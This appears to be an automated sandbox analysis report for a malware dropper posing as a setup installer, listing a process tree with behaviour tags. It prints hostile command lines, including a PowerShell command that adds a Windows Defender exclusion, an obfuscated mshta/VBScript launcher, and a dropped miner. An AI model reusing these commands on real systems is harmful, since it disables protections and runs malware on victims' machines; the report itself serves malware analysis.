Conhost.exe 5008 setup.tmp 5140 schtasks.exe 5076 WMIADAP.EXE 2964 setup_2.exe 1448 cutm3.exe 2476 setup.exe 4404 extd.exe 4616 setup.tmp 852 inst3.exe 5564 ZNjEhM7gVrAAxuwEiyqOJ34t.exe 6280 powershell.exe 6916 timeout.exe 6268 extd.exe 6920 postback.exe 5560 AppLaunch.exe 6980 cmd.exe 3928 LzmwAqmV.exe 3764 EASS.exe 3500 tDQQVMK4kh5kC_VXdu6mwGw2.exe 2868 As_7_fJ9jiliYff_bkd0HLSb.exe 3720 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
CrowdInspect.exeCrowdInspect64.exemsedge.exedescription pid process target process PID 1628 wrote to memory of 1816 1628 CrowdInspect.exe CrowdInspect64.exe PID 1628 wrote to memory of 1816 1628 CrowdInspect.exe CrowdInspect64.exe PID 1816 wrote to memory of 4284 1816 CrowdInspect64.exe msedge.exe PID 1816 wrote to memory of 4284 1816 CrowdInspect64.exe msedge.exe PID 4284 wrote to memory of 3980 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3980 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 2532 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 4024 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 4024 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe PID 4284 wrote to memory of 3716 4284 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CrowdInspect.sfx.exe"C:\Users\Admin\AppData\Local\Temp\CrowdInspect.sfx.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv I50SDwAzrk2EvCFYy6B5rQ.01⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.crowdstrike.com/inspect/replaceav3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:14⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11b7ab2df056a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exeMon11b7ab2df056a.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exeC:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon114917d808c86e0ba.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exeMon114917d808c86e0ba.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-7RH96.tmp\Mon114917d808c86e0ba.tmp"C:\Users\Admin\AppData\Local\Temp\is-7RH96.tmp\Mon114917d808c86e0ba.tmp" /SL5="$700C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe"C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe" /SILENT7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-A9KQG.tmp\Mon114917d808c86e0ba.tmp"C:\Users\Admin\AppData\Local\Temp\is-A9KQG.tmp\Mon114917d808c86e0ba.tmp" /SL5="$601FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-S51V3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-S51V3.tmp\postback.exe" ss19⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon112c3d79b6fdf8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon112c3d79b6fdf8.exeMon112c3d79b6fdf8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 2846⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11bc113a5813.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exeMon11bc113a5813.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exeC:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exe6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 287⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11991188390d59.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11991188390d59.exeMon11991188390d59.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 2846⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1190ed9443.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exeMon1190ed9443.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 19126⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11f55cde4ec30.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exeMon11f55cde4ec30.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exeC:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\mminer.exe"C:\Users\Admin\AppData\Local\Temp\mminer.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1173d8f84c056.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1173d8f84c056.exeMon1173d8f84c056.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon110c83ac9fca39.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon110c83ac9fca39.exeMon110c83ac9fca39.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\HJvxq8lTLdmwcqK6tzGee8KT.exe"C:\Users\Admin\Documents\HJvxq8lTLdmwcqK6tzGee8KT.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\fLt5aaWDMdJHJUJsdaAbuivD.exe"C:\Users\Admin\Pictures\Adobe Films\fLt5aaWDMdJHJUJsdaAbuivD.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\GBI_yH9a9U9c0kT8e_JoFRwy.exe"C:\Users\Admin\Pictures\Adobe Films\GBI_yH9a9U9c0kT8e_JoFRwy.exe" /mixtwo8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2889⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\G11bso2kaqD8zyt7zjqFKTew.exe"C:\Users\Admin\Pictures\Adobe Films\G11bso2kaqD8zyt7zjqFKTew.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\W2JFSO1Ax2gZg76M0IGV9hjG.exe"C:\Users\Admin\Pictures\Adobe Films\W2JFSO1Ax2gZg76M0IGV9hjG.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\93ZmYt7z4b0Vv4V67aT8bYvi.exe"C:\Users\Admin\Pictures\Adobe Films\93ZmYt7z4b0Vv4V67aT8bYvi.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "xjoDIB1cgkY5rhQ62iKlOsJ7.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\s9ldn7_ecQr1OKXD8s8Chci6.exe"C:\Users\Admin\Pictures\Adobe Films\s9ldn7_ecQr1OKXD8s8Chci6.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9012⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,14913646324800417076,7703059395117259456,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2916_1239287217" --mojo-platform-channel-handle=1740 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PIJ8C.tmp\mrHwPgjMlMAKo1RO_q8Zcfe4.tmp"C:\Users\Admin\AppData\Local\Temp\is-PIJ8C.tmp\mrHwPgjMlMAKo1RO_q8Zcfe4.tmp" /SL5="$40484,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-H0QUK.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-H0QUK.tmp\ShareFolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\QCMBWQQTIC\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\QCMBWQQTIC\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\2d-ef9d3-a9b-e74b2-964391f3d899f\Punolebale.exe"C:\Users\Admin\AppData\Local\Temp\2d-ef9d3-a9b-e74b2-964391f3d899f\Punolebale.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:213⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5252 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:113⤵
-
